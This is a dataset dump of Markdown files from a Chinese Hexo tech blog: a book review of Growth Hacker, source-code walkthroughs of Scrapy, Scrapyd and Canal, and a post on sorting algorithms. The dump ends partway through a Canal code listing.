"alphanum_fraction": 0.6741573214530945,
"avg_line_length": 13.833333015441895,
"blob_id": "f4e9f8c836f59471f03673681d85f6f375f538f3",
"content_id": "0eaa003d272606068c7c8c399282e98a0de80d20",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 89,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 6,
"path": "/source/categories/index.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\n# title: categories\ndate: 2018-06-09 21:31:08\ntype: \"categories\"\ncomments: false\n---\n"
},
{
"alpha_fraction": 0.8471337556838989,
"alphanum_fraction": 0.8704883456230164,
"avg_line_length": 38.29166793823242,
"blob_id": "7d9ab065961f5ec0520d2475c7e589478beff9ce",
"content_id": "3b7ff98ef1ea067671de44a8543d32832f2ac1e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2560,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 24,
"path": "/source/_posts/growthhacker.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: 《增长黑客》读后感\ndate: 2018-06-03 21:32:56\ncategories: 产品&运营\ntags: [增长黑客,Growth Hacker,用户增长]\n---\n\n增长黑客(Growth Hacker)源于硅谷,最早在2010年提出,真正引起业界关注是在2012年。一句话来描述是指这样一群人,他们以数据驱动营销、以市场指导产品,通过技术手段来达到增长目标的人群。---需要了解技术,又得了解用户心理,发挥创意,绕过限制,通过低成本解决初创公司产品早期的增长问题。\n\n书中通过对各种案例的分析讲解产品早期用户增长的策略、方法。早期产品选型,要以需求作为产品的第一原动力,用最小化实验验证产品可行性,探测市场需求。\n\n产品上线之后需要筛选种子用户试用,有效利用设计红利,打造可持续输出的内容营销引擎,其中搜索引擎和应用商店的SEO也是可以给产品带来有效流量的。\n\n种子用户可以给产品带来良好的口碑,前提是产品体验要顺畅,没有明显的bug。接下来就要激发活跃,这里提到了A/B测试,提升网站或者应用的活跃率方法。\n\n光有用户使用,完了之后就离开也不行,这时候需要提高留存率,减少用户流失,根据用户流失原因,对应相应的措施来提高产品的用户粘性,第一就要优化产品性能,这是用户流失的主要原因。再者就是放下不必要的功能,保证整个产品体验,这里可以提供有缺失的服务,但不能提供体验不好的服务。还有就是新手引导、社交绑定、设计用户唤醒机制等等。\n\n每个产品从立项起,最终的目的还是为了挣钱。当流量上来之后就得考虑如何盈利了。这里最简单的可能就是植入广告了,但这也会造成用户体验不好。\n\n营销上有个术语叫做病毒传播,这是用户增长的有效方法,包括蓄意策划的bug营销,借助热点乘势营销,以及产品内的病毒循环等等。这些都建立在对用户心理的了解及把握,打造出用户需要又有盈利的产品。\n\n在书的最后提到了几个互联网公司的增长案例,真的感觉技术之外的策略、门道很多,当然最后还谈到了职业道德问题,国外的相关政策较为成熟,国内还很欠缺,增长黑客们要以全球化的标准来对待用户隐私方面的问题。\n\n第一次读这种偏向运营和产品的书,感觉还是收获满满,希望对以后的职业发展有所启发。"
},
{
"alpha_fraction": 0.6587662696838379,
"alphanum_fraction": 0.6623764038085938,
"avg_line_length": 35.20454406738281,
"blob_id": "33d7d2b59fd1da86c67389fc74c1990266e26bd4",
"content_id": "bf41271f3367862c3b2b594d22ca3ceee7369d1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7069,
"license_type": "no_license",
"max_line_length": 310,
"num_lines": 176,
"path": "/source/_posts/scrapy-downloader.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: Scrapy下载流程解析\ndate: 2018-06-25 21:40:57\ncategories: 源码研究 #文章文类\ntags: [Scrapy,源码,python] #文章标签,多于一项时用这种格式\n---\n对照下面的脑图,理解整个Scrapy下载流程:\n\n\n首先接着上篇,Engine中注册到事件循环的_next_request_from_scheduler()方法开始。\n\n> 实际上注册的是_next_request(),但_next_request()中真正执行的是_next_request_from_scheduler()\n\n看下这个方法:\n\n```\ndef _next_request_from_scheduler(self, spider):\n slot = self.slot\n request = slot.scheduler.next_request()\n if not request:\n return\n d = self._download(request, spider)\n d.addBoth(self._handle_downloader_output, request, spider)\n d.addErrback(lambda f: logger.info('Error while handling downloader output',\n exc_info=failure_to_exc_info(f),\n extra={'spider': spider}))\n d.addBoth(lambda _: slot.remove_request(request))\n d.addErrback(lambda f: logger.info('Error while removing request from slot',\n exc_info=failure_to_exc_info(f),\n extra={'spider': spider}))\n d.addBoth(lambda _: slot.nextcall.schedule())\n d.addErrback(lambda f: logger.info('Error while scheduling new request',\n exc_info=failure_to_exc_info(f),\n extra={'spider': spider}))\n return d\n\ndef _download(self, request, spider):\n slot = self.slot\n slot.add_request(request)\n def _on_success(response):\n assert isinstance(response, (Response, Request))\n if isinstance(response, Response):\n response.request = request # tie request to response received\n logkws = self.logformatter.crawled(request, response, spider)\n logger.log(*logformatter_adapter(logkws), extra={'spider': spider})\n self.signals.send_catch_log(signal=signals.response_received, \\\n response=response, request=request, spider=spider)\n return response\n\n def _on_complete(_):\n slot.nextcall.schedule()\n return _\n\n dwld = self.downloader.fetch(request, spider)\n dwld.addCallbacks(_on_success)\n dwld.addBoth(_on_complete)\n return dwld\n```\n\n结合上面我总结的脑图,实际上是调用Downloader的fetch()方法:\n```\ndef fetch(self, request, spider):\n def _deactivate(response):\n self.active.remove(request)\n return response\n\n self.active.add(request)\n dfd = self.middleware.download(self._enqueue_request, request, spider)\n return dfd.addBoth(_deactivate)\n\n```\n这个fetch方法有会调用middleware的download方法;这里的middleware是DownloaderMiddlewareManager,会实例化配置的所有下载中间件。并在download()方法中依序执行process_request、process_response方法,其中process_request是正序执行、process_response是逆序执行。并且会在所有中间件执行process_request之后,process_response执行之前执行真正的下载方法,这个方法是Downloader调用middleware时注册进来的_enqueue_request方法;看下面这个方法:\n```\ndef _enqueue_request(self, request, spider):\n key, slot = self._get_slot(request, spider)\n request.meta['download_slot'] = key\n\n def _deactivate(response):\n slot.active.remove(request)\n return response\n\n slot.active.add(request)\n deferred = defer.Deferred().addBoth(_deactivate)\n slot.queue.append((request, deferred))\n self._process_queue(spider, slot)\n return deferred\n\ndef _process_queue(self, spider, slot):\n if slot.latercall and slot.latercall.active():\n return\n\n # Delay queue processing if a download_delay is configured\n now = time()\n delay = slot.download_delay()\n if delay:\n penalty = delay - now + slot.lastseen\n if penalty > 0:\n slot.latercall = reactor.callLater(penalty, self._process_queue, spider, slot)\n return\n\n # Process enqueued requests if there are free slots to transfer for this slot\n while slot.queue and slot.free_transfer_slots() > 0:\n slot.lastseen = now\n request, deferred = slot.queue.popleft()\n dfd = self._download(slot, request, spider)\n dfd.chainDeferred(deferred)\n # prevent burst if inter-request delays were configured\n if delay:\n self._process_queue(spider, slot)\n break\n```\n\n看这里会做相应的并发控制,最终会调用_download()方法;\n```\ndef _download(self, slot, request, spider):\n # The order is very important for the following deferreds. Do not change!\n\n # 1. Create the download deferred\n dfd = mustbe_deferred(self.handlers.download_request, request, spider)\n\n # 2. Notify response_downloaded listeners about the recent download\n # before querying queue for next request\n def _downloaded(response):\n self.signals.send_catch_log(signal=signals.response_downloaded,\n response=response,\n request=request,\n spider=spider)\n return response\n dfd.addCallback(_downloaded)\n\n # 3. After response arrives, remove the request from transferring\n # state to free up the transferring slot so it can be used by the\n # following requests (perhaps those which came from the downloader\n # middleware itself)\n slot.transferring.add(request)\n\n def finish_transferring(_):\n slot.transferring.remove(request)\n self._process_queue(spider, slot)\n return _\n\n return dfd.addBoth(finish_transferring)\n```\n\n这里会调用handles的download_request()方法;handlers是DownloadHandlers,会加载配置中所有的DOWNLOAD_HANDLERS并实例化。\n\n```\ndef download_request(self, request, spider):\n scheme = urlparse_cached(request).scheme\n handler = self._get_handler(scheme)\n if not handler:\n raise NotSupported(\"Unsupported URL scheme '%s': %s\" %\n (scheme, self._notconfigured[scheme]))\n return handler.download_request(request, spider)\n```\n\n这个地方会根据Request的协议类型,调用相应的handler执行下载请求;下面以Http为例,继续下面的流程;\n> HttpDownloadHandler其实是HTTP10DownloadHandler的扩展,实际的下载器是HTTP10DownloadHandler\n\n```\ndef download_request(self, request, spider):\n \"\"\"Return a deferred for the HTTP download\"\"\"\n factory = self.HTTPClientFactory(request)\n self._connect(factory)\n return factory.deferred\n\ndef _connect(self, factory):\n host, port = to_unicode(factory.host), factory.port\n if factory.scheme == b'https':\n return reactor.connectSSL(host, port, factory,\n self.ClientContextFactory())\n else:\n return reactor.connectTCP(host, port, factory)\n```\n\n这里直接调用的Twisted的相关网络实现来完成下载请求的。"
},
{
"alpha_fraction": 0.7082836627960205,
"alphanum_fraction": 0.7264600992202759,
"avg_line_length": 44.364864349365234,
"blob_id": "a8c9725d7fde4fcf0ad11366e3770556b45585e1",
"content_id": "6490a04d9f808a748adcbc2b7ec17ddf1bfb36f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4278,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 74,
"path": "/source/_posts/canal04.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: Canal系列04-并行解析Disruptor实现\ndate: 2019-06-19 23:03:14\ncategories: Canal系列\ntags: [canal]\n---\n## 一、Disruptor介绍\nDisruptor它是一个开源的并发框架,并获得2011 Duke’s 程序框架创新奖,能够在无锁的情况下实现网络的Queue并发操作。\n\n研发的初衷是解决内存队列的延迟问题(在性能测试中发现竟然与I/O操作处于同样的数量级)。基于Disruptor开发的系统单线程能支撑每秒600万订单,2010年在QCon演讲后,获得了业界关注。\n\n目前,包括Apache Storm、Camel、Log4j 2在内的很多知名项目都应用了Disruptor以获取高性能。在美团技术团队它也有不少应用,有的项目架构借鉴了它的设计机制。\n\nCanal在并行解析binlog的实现中使用了Disruptor,所有这里需要对Disruptor有一定的了解,更多的使用方法及原理请查阅文章下面的参考文献\n\n## 二、并行解析实现\n接上篇[Canal系列03-Parser模块](http://blog.7street.top/2019/06/17/canal03/)说到并行解析是Disruptor实现。下面的注释代码方便理解,需要对Disruptor有一定的了解才能理解哦。这也给我们提供了一个使用多阶段多线程使用Disruptor的最佳实践。\n```\npublic void start() {\n // 设置running状态字段\n super.start();\n this.exception = null;\n // 初始化RingBuffer,简单解析,事件深度解析,sink store多线程协作\n this.disruptorMsgBuffer = RingBuffer.createSingleProducer(new MessageEventFactory(),\n ringBufferSize,\n new BlockingWaitStrategy());\n int tc = parserThreadCount > 0 ? parserThreadCount : 1;\n this.parserExecutor = Executors.newFixedThreadPool(tc, new NamedThreadFactory(\"MultiStageCoprocessor-Parser-\" + destination));\n\n this.stageExecutor = Executors.newFixedThreadPool(2, new NamedThreadFactory(\"MultiStageCoprocessor-other-\" + destination));\n \n // barrier用来维护事件处理顺序的\n SequenceBarrier sequenceBarrier = disruptorMsgBuffer.newBarrier();\n ExceptionHandler exceptionHandler = new SimpleFatalExceptionHandler();\n // stage 2 -> 简单解析,事件类型、DDL解析构造TableMeta、维护位点信息、是否需要DML解析\n this.logContext = new LogContext();\n simpleParserStage = new BatchEventProcessor<MessageEvent>(disruptorMsgBuffer,\n sequenceBarrier,\n new SimpleParserStage(logContext));\n simpleParserStage.setExceptionHandler(exceptionHandler);\n disruptorMsgBuffer.addGatingSequences(simpleParserStage.getSequence());\n\n // stage 3 -> 事件深度解析 (多线程, DML事件数据的完整解析)\n SequenceBarrier dmlParserSequenceBarrier = disruptorMsgBuffer.newBarrier(simpleParserStage.getSequence());\n WorkHandler<MessageEvent>[] workHandlers = new DmlParserStage[tc];\n for (int i = 0; i < tc; i++) {\n // 事件解析 eventhandler\n workHandlers[i] = new DmlParserStage();\n }\n // 使用workerPool管理多个解析线程\n workerPool = new WorkerPool<MessageEvent>(disruptorMsgBuffer,\n dmlParserSequenceBarrier,\n exceptionHandler,\n workHandlers);\n Sequence[] sequence = workerPool.getWorkerSequences();\n disruptorMsgBuffer.addGatingSequences(sequence);\n\n // stage 4 -> 最后投递到store (单线程)\n SequenceBarrier sinkSequenceBarrier = disruptorMsgBuffer.newBarrier(sequence);\n sinkStoreStage = new BatchEventProcessor<MessageEvent>(disruptorMsgBuffer,\n sinkSequenceBarrier,\n new SinkStoreStage());// 将解析后的event存储到transactionBuffer中\n sinkStoreStage.setExceptionHandler(exceptionHandler);\n disruptorMsgBuffer.addGatingSequences(sinkStoreStage.getSequence());\n\n // start work,启动各个阶段的处理线程\n stageExecutor.submit(simpleParserStage);\n stageExecutor.submit(sinkStoreStage);\n workerPool.start(parserExecutor);\n }\n```\n## 三、参考文献\n[高性能队列—Disruptor](https://tech.meituan.com/2016/11/18/disruptor.html)\n[并发框架DISRUPTOR译文](https://coolshell.cn/articles/9169.html)"
},
{
"alpha_fraction": 0.7137874960899353,
"alphanum_fraction": 0.7177400588989258,
"avg_line_length": 27.676666259765625,
"blob_id": "81a3a49a2d7eb341018b1e61efa5630072159e36",
"content_id": "9a6582b93a1604e66449630a7943e93908444234",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 10506,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 300,
"path": "/source/_posts/scrapyd-flow.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: Scrapyd运行流程总结\ndate: 2018-07-26 22:35:20\ncategories: 源码研究 #文章文类\ntags: [Scrapyd,源码,python] #文章标签,多于一项时用这种格式\n---\n### 执行入口\n入口程序在Scrapyd源代码的setup.py中指定:\n[Github - Scrapyd](https://github.com/scrapy/scrapyd/blob/master/setup.py)\n```\n setup_args['entry_points'] = {'console_scripts': [\n # 打包后命令执行入口\n 'scrapyd = scrapyd.scripts.scrapyd_run:main'\n ]}\n```\n\n从代码可以看到,入口程序:scrapyd/scripts/scrapyd_run.py的main()函数;\n\n```\n#!/usr/bin/env python\n\nfrom twisted.scripts.twistd import run\nfrom os.path import join, dirname\nfrom sys import argv\nimport scrapyd\n\n# Scrapyd 命令入口\ndef main():\n\t# -n:非守护进程方式启动;\n\t# -y:使用用户指定的application,这里有txapp.py生成application\n argv[1:1] = ['-n', '-y', join(dirname(scrapyd.__file__), 'txapp.py')]\n # 执行twisted.scripts.twistd中的run()函数\n run()\n\nif __name__ == '__main__':\n main()\n```\n这里是使用twistd命令,参数:【-n;-y】具体功能可以查看twistd -h查看,注释也写清楚了。\n\n### Twisted源码解析\n\n最终执行的是twisted/scripts/twistd.py的run()方法;\n\n\n```\n# -*- test-case-name: twisted.test.test_twistd -*-\n# Copyright (c) Twisted Matrix Laboratories.\n# See LICENSE for details.\n\n\"\"\"\nThe Twisted Daemon: platform-independent interface.\n\n@author: Christopher Armstrong\n\"\"\"\n\nfrom __future__ import absolute_import, division\n\nfrom twisted.application import app\n\nfrom twisted.python.runtime import platformType\nif platformType == \"win32\":\n from twisted.scripts._twistw import ServerOptions, \\\n WindowsApplicationRunner as _SomeApplicationRunner\nelse:\n from twisted.scripts._twistd_unix import ServerOptions, \\\n UnixApplicationRunner as _SomeApplicationRunner\n\ndef runApp(config):\n runner = _SomeApplicationRunner(config)\n # 调用twisted.scripts._twistd_unix.UnixApplicationRunner.run()方法\n runner.run()\n if runner._exitSignal is not None:\n app._exitWithSignal(runner._exitSignal)\n\n\ndef run():\n\t# 直接调用twisted.application.app.run()方法,这里最终调用上面 的runApp(config)方法\n app.run(runApp, ServerOptions)\n\n\n__all__ = ['run', 'runApp']\n```\n\n代码不多,直接贴上了。正如注释中所写,程序最终调用的是UnixApplicationRunner(Linux下)或者WindowsApplicationRunner(Windows下)的run()方法;\n\n下面使用UnixApplicationRunner进行下面的流程。\n\n```\n# 启动application\ndef run(self):\n \"\"\"\n Run the application.\n \"\"\"\n # 预处理,检查进程ID,输入输出\n self.preApplication()\n # 获取application,创建or根据用户指定的实例化\n self.application = self.createOrGetApplication()\n\n self.logger.start(self.application)\n # 启动application & 事件循环\n self.postApplication()\n self.logger.stop()\n```\n\n这里createOrGetApplication()方法,就是用来加载前面scrapyd入口脚本中-y指定的txapp.py中的application的,这个到后面启动Service的时候,还会出现。\n\n调用postApplication()启动应用和Twisted的事件循环;\n\n```\ndef postApplication(self):\n \"\"\"\n To be called after the application is created: start the application\n and run the reactor. After the reactor stops, clean up PID files and\n such.\n \"\"\"\n try:\n #启动应用\n self.startApplication(self.application)\n except Exception as ex:\n statusPipe = self.config.get(\"statusPipe\", None)\n if statusPipe is not None:\n message = self._formatChildException(ex)\n untilConcludes(os.write, statusPipe, message)\n untilConcludes(os.close, statusPipe)\n self.removePID(self.config['pidfile'])\n raise\n else:\n statusPipe = self.config.get(\"statusPipe\", None)\n if statusPipe is not None:\n untilConcludes(os.write, statusPipe, b\"0\")\n untilConcludes(os.close, statusPipe)\n # 启动Twisted事件循环\n self.startReactor(None, self.oldstdout, self.oldstderr)\n self.removePID(self.config['pidfile'])\n \ndef startApplication(self, application):\n \"\"\"\n Configure global process state based on the given application and run\n the application.\n\n @param application: An object which can be adapted to\n L{service.IProcess} and L{service.IService}.\n \"\"\"\n process = service.IProcess(application)\n if not self.config['originalname']:\n launchWithName(process.processName)\n self.setupEnvironment(\n self.config['chroot'], self.config['rundir'],\n self.config['nodaemon'], self.config['umask'],\n self.config['pidfile'])\n\n service.IService(application).privilegedStartService()\n\n uid, gid = self.config['uid'], self.config['gid']\n if uid is None:\n uid = process.uid\n if gid is None:\n gid = process.gid\n if uid is not None and gid is None:\n gid = pwd.getpwuid(uid).pw_gid\n\n self.shedPrivileges(self.config['euid'], uid, gid)\n # 启动application\n app.startApplication(application, not self.config['no_save'])\n```\n\n这里最终还是调用app.startApplication();\n\n```\ndef startApplication(application, save):\n from twisted.internet import reactor\n # 这里就启动了twistd的application,application内部会有多个Service&component\n service.IService(application).startService()\n if save:\n p = sob.IPersistable(application)\n reactor.addSystemEventTrigger('after', 'shutdown', p.save, 'shutdown')\n reactor.addSystemEventTrigger('before', 'shutdown',\n service.IService(application).stopService)\n```\n\n到这个地方,一般正常使用Twisted的应用就是这么启动的。\n具体怎么启动(startService)的?这块儿,我纠结的两天时间。\n\n其实,这个地方的Twisted Application是个Componentized mixin,具体还得从上面我们指定的txapp.py看起。\n\n```\n# scrapyd/txapp.py\n\n# this file is used to start scrapyd with twistd -y\nfrom scrapyd import get_application\napplication = get_application()\n\n\n# scrapyd/__init__.py\n\nimport pkgutil\n\n__version__ = pkgutil.get_data(__package__, 'VERSION').decode('ascii').strip()\nversion_info = tuple(__version__.split('.')[:3])\n\nfrom scrapy.utils.misc import load_object\nfrom scrapyd.config import Config\n\n\ndef get_application(config=None):\n if config is None:\n config = Config()\n apppath = config.get('application', 'scrapyd.app.application')\n appfunc = load_object(apppath)\n return appfunc(config)\n \n\n```\n\n这个地方最终return的是scrapyd/app.py的Application;这才是Scrapyd的核心实现:\n\n```\nfrom twisted.application.service import Application\nfrom twisted.application.internet import TimerService, TCPServer\nfrom twisted.web import server\nfrom twisted.python import log\n\nfrom scrapy.utils.misc import load_object\n\nfrom .interfaces import IEggStorage, IPoller, ISpiderScheduler, IEnvironment\nfrom .eggstorage import FilesystemEggStorage\nfrom .scheduler import SpiderScheduler\nfrom .poller import QueuePoller\nfrom .environ import Environment\nfrom .config import Config\n\ndef application(config):\n app = Application(\"Scrapyd\")\n # 监听端口\n http_port = config.getint('http_port', 6800)\n # 绑定IP地址\n bind_address = config.get('bind_address', '127.0.0.1')\n # TimerService的轮询间隔\n poll_interval = config.getfloat('poll_interval', 5)\n\n # 队列 -- 每个project一个队列\n poller = QueuePoller(config)\n # 打包 & 部署后的egg路径\n eggstorage = FilesystemEggStorage(config)\n # 调度器\n scheduler = SpiderScheduler(config)\n # 环境变量\n environment = Environment(config)\n\n # Application是Componentized mixin,可以set很多组件\n app.setComponent(IPoller, poller)\n app.setComponent(IEggStorage, eggstorage)\n app.setComponent(ISpiderScheduler, scheduler)\n app.setComponent(IEnvironment, environment)\n\n # launcher 具体启停Spider等,执行相应的命令\n laupath = config.get('launcher', 'scrapyd.launcher.Launcher')\n laucls = load_object(laupath)\n launcher = laucls(config, app)\n\n webpath = config.get('webroot', 'scrapyd.website.Root')\n webcls = load_object(webpath)\n\n # 每5秒钟 从队列虫取出已经schedule到队列中的Spider执行\n timer = TimerService(poll_interval, poller.poll)\n # web服务,接收web请求,包括查看log,启动Spider,列出所有project等等。。。\n webservice = TCPServer(http_port, server.Site(webcls(config, app)), interface=bind_address)\n log.msg(format=\"Scrapyd web console available at http://%(bind_address)s:%(http_port)s/\",\n bind_address=bind_address, http_port=http_port)\n\n # 这里是重点了,setServiceParent将app设置为自身的parent,同时会调用自身的startService()方法(因为launcher、timer、webservice都是IService的),这样每个Service都启动了。\n # 这个地方纠结的两天。。。\n launcher.setServiceParent(app)\n timer.setServiceParent(app)\n webservice.setServiceParent(app)\n\n return app\n```\n### Scrapyd的核心实现\n主要包括以3个主要服务:\n- Launcher\n - 主要功能是执行调度任务,从Poller中获取已经调度的任务并执行\n- TCPServer\n - 主要提供Web服务,通过Http接收请求。包括Job、Schedule、Logs等等\n- TimerService\n - 周期执行(5s),主要功能是从Web Server接收的调度任务中,每次每个project调度一个任务给Launcher执行\n\n以及下面两个辅助的数据结构:\n\n- Poller\n - 对队列使用的一层抽象\n- SqliteSpiderQueue\n - 使用Sqlite作为队列底层存储的抽象\n\n\n\n为了方便理解,看代码理解的时候总结了一张思维导图,如导图中所描述的,这样Scrapyd的三个核心服务,组成一个任务环,中间通过Poller和SqliteSpiderQueue两个辅助数据结构,实现类似生产者消费者模式。\n\n这就是Scrapyd的核心实现,实现简单日志监控、任务调度、项目发布等基本功能接口。解决了Scrapy使用过程中的部分痛点。\n由于Scrapyd使用还是面向程序员,管理控制台比较简陋且功能不完善,所以才有Gerapy出现了,可以在管理控制台上实现项目发布、启动Spider等等。但Gerapy做的也不太完善,比如周期性调度Spider等没有实现,可能在开发中。。。"
},
{
"alpha_fraction": 0.5335820913314819,
"alphanum_fraction": 0.5746268630027771,
"avg_line_length": 27.846153259277344,
"blob_id": "a63c0b7ced48d2492d47f68082b86e9987e5b8ef",
"content_id": "734aad4bd35cbeb15922d86ab39ff8d67aa39665",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2724,
"license_type": "no_license",
"max_line_length": 261,
"num_lines": 65,
"path": "/source/_posts/sort.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "title: '排序算法'\ndate: 2014-07-09 00:02:53\ncategories: 算法 #文章文类\ntags: [算法,快排,python] #文章标签,多于一项时用这种格式\n---\n\n### 1.选择排序:\n**思想**:[选择排序](http://baike.baidu.com/view/547263.htm?fr=aladdin)是简单但不稳定的排序算法,时间复杂度为O(n^2),是选择最小(或最大)的元素插入到当前主循环位置上。\n``` bash\ndef select_sort(li):\n for i in range(0, len(li)-1):\n min = i+1\n # 找出i+1之后元素中最下的一个\n for j in range(i+1, len(li)):\n if li[j] < li[min]:\n min = j\n # 如果后面的元素小,则交换\n if li[i] > li[min]:\n li[i], li[min] = li[min], li[i]\n```\n\t\n \n### 2.插入排序: \n**思想**:[插入排序](http://baike.baidu.com/view/396887.htm?fr=aladdin)是一种简单且稳定的排序算法,时间复杂度为O(n^2),算法默认主循环之前的为有序,主循环之后的相继找到他应在的位置,保证主循环之前有序,直到循环结束。\n\n``` bash\ndef insert_sort(li):\n for i in range(1, len(li)):\n # 这里需要注意range函数在倒序的时候 获取最后(也就是索引为0)的元素时 end 要用-1 使用0总是落下第一个元素\n # 调试了很长时间 谨记\n for j in range(i-1, -1, -1):\n if li[j] > li[j+1]:\n li[j], li[j+1] = li[j+1], li[j]\n```\n \n### 3.快速排序\n\n[快速排序](http://baike.baidu.com/view/19016.htm?from_id=2084344&type=syn&fromtitle=%E5%BF%AB%E9%80%9F%E6%8E%92%E5%BA%8F&fr=aladdin)是对冒泡排序的改进,时间复杂度为O(n*log2n).基本思想是:通过一趟排序将要排序的数据分割成独立的两部分,其中一部分的所有数据都比另外一部分的所有数据都要小,然后再按此方法对这两部分数据分别进行快速排序,整个排序过程可以递归进行,以此达到整个数据变成有序序列。\n\n```bash\n# 将数组中元素按某个默认元素key分开,其前面的元素都小于key,其后面元素都大于key,返回key所在的索引\ndef divide_two(li, low, high):\n flag = li[low]\n while low < high:\n while low < high and li[high] > flag:\n high -= 1\n if low < high:\n li[low] = li[high]\n low += 1\n\n while low < high and li[low] < flag:\n low += 1\n if low < high:\n li[high] = li[low]\n high -= 1\n li[low] = flag\n return low\n\n# 递归调用,完成排序\ndef quick_sort(li, low, high):\n if low < high:\n mid = divide_two(li, low, high)\n quick_sort(li, 0, mid-1)\n quick_sort(li, mid+1, high)\n```\n\n"
},
{
"alpha_fraction": 0.4788624048233032,
"alphanum_fraction": 0.48185157775878906,
"avg_line_length": 47.99581527709961,
"blob_id": "9b5ea381a2f39760dda42fd944906fe3bb9f1902",
"content_id": "f61a1554191e0bfec27aa643d209934a341cf2b6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 12883,
"license_type": "no_license",
"max_line_length": 241,
"num_lines": 239,
"path": "/source/_posts/canal03.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: Canal系列03-Parser模块\ndate: 2019-06-17 23:31:29\ncategories: Canal系列\ntags: [canal]\n---\n## 一、入口\n接上节,从Spring配置文件file-instance.xml中可以看到,eventParser继承了base-instance.xml中的baseEventParser,查看base-instance.xml可以看到,eventParser是com.alibaba.otter.canal.parse.inbound.mysql.rds.RdsBinlogEventParserProxy的实例,就是调用的RdsBinlogEventParserProxy的start()方法。\n\n```\n# file-instance.xml\n<bean id=\"eventParser\" parent=\"baseEventParser\">\n\n# base-instance.xml\n<bean id=\"baseEventParser\" class=\"com.alibaba.otter.canal.parse.inbound.mysql.rds.RdsBinlogEventParserProxy\" abstract=\"true\">\n <property name=\"accesskey\" value=\"${canal.aliyun.accesskey:}\" />\n <property name=\"secretkey\" value=\"${canal.aliyun.secretkey:}\" />\n <property name=\"instanceId\" value=\"${canal.instance.rds.instanceId:}\" />\n</bean>\n```\n\n## 二、代码解析\nRdsBinlogEventParserProxy.start()方法一路super.start(),最终调用的是父类AbstractEventParser的start()方法。\n```\n// eventParser start一路super最终调用的是AbstractEventParser的start()方法\npublic void start() {\n // 设置running为true\n super.start();\n MDC.put(\"destination\", destination);\n // 配置transaction buffer\n // 初始化缓冲队列\n transactionBuffer.setBufferSize(transactionSize);// 设置buffer大小\n transactionBuffer.start();\n // 构造bin log parser\n binlogParser = buildParser();// 初始化一下BinLogParser\n binlogParser.start();\n // 启动工作线程\n parseThread = new Thread(new Runnable() {\n\n public void run() {\n MDC.put(\"destination\", String.valueOf(destination));\n ErosaConnection erosaConnection = null;\n while (running) {\n try {\n // 开始执行replication\n // 1. 构造Erosa连接\n erosaConnection = buildErosaConnection();\n\n // 2. 启动一个心跳线程\n startHeartBeat(erosaConnection);\n\n // 3. 执行dump前的准备工作\n preDump(erosaConnection);\n\n erosaConnection.connect();// 链接\n\n long queryServerId = erosaConnection.queryServerId();\n if (queryServerId != 0) {\n serverId = queryServerId;\n }\n // 4. 获取最后的位置信息\n long start = System.currentTimeMillis();\n logger.warn(\"---> begin to find start position, it will be long time for reset or first position\");\n EntryPosition position = findStartPosition(erosaConnection);\n final EntryPosition startPosition = position;\n if (startPosition == null) {\n throw new PositionNotFoundException(\"can't find start position for \" + destination);\n }\n\n if (!processTableMeta(startPosition)) {\n throw new CanalParseException(\"can't find init table meta for \" + destination\n + \" with position : \" + startPosition);\n }\n long end = System.currentTimeMillis();\n logger.warn(\"---> find start position successfully, {}\", startPosition.toString() + \" cost : \"\n + (end - start)\n + \"ms , the next step is binlog dump\");\n // 重新链接,因为在找position过程中可能有状态,需要断开后重建\n erosaConnection.reconnect();\n // 非并行模式下,接到master的event交给sinkHandler处理\n final SinkFunction sinkHandler = new SinkFunction<EVENT>() {\n\n private LogPosition lastPosition;\n\n public boolean sink(EVENT event) {\n try {\n // 这里会调用binlogParser进行解析成CanalEntry.Entry\n CanalEntry.Entry entry = parseAndProfilingIfNecessary(event, false);\n\n if (!running) {\n return false;\n }\n\n if (entry != null) {\n exception = null; // 有正常数据流过,清空exception\n // 将数据存入内存队列中\n transactionBuffer.add(entry);\n // 记录一下对应的positions\n this.lastPosition = buildLastPosition(entry);\n // 记录一下最后一次有数据的时间\n lastEntryTime = System.currentTimeMillis();\n }\n return running;\n } catch (TableIdNotFoundException e) {\n throw e;\n } catch (Throwable e) {\n if (e.getCause() instanceof TableIdNotFoundException) {\n throw (TableIdNotFoundException) e.getCause();\n }\n // 记录一下,出错的位点信息\n processSinkError(e,\n this.lastPosition,\n startPosition.getJournalName(),\n startPosition.getPosition());\n throw new CanalParseException(e); // 继续抛出异常,让上层统一感知\n }\n }\n\n };\n\n // 4. 开始dump数据,默认并行,使用disruptor.RingBuffer实现\n if (parallel) {\n // build stage processor\n multiStageCoprocessor = buildMultiStageCoprocessor();\n if (isGTIDMode() && StringUtils.isNotEmpty(startPosition.getGtid())) {\n // 判断所属instance是否启用GTID模式,是的话调用ErosaConnection中GTID对应方法dump数据\n GTIDSet gtidSet = MysqlGTIDSet.parse(startPosition.getGtid());\n ((MysqlMultiStageCoprocessor) multiStageCoprocessor).setGtidSet(gtidSet);\n multiStageCoprocessor.start();\n erosaConnection.dump(gtidSet, multiStageCoprocessor);\n } else {\n multiStageCoprocessor.start();\n if (StringUtils.isEmpty(startPosition.getJournalName())\n && startPosition.getTimestamp() != null) {\n erosaConnection.dump(startPosition.getTimestamp(), multiStageCoprocessor);\n } else {\n 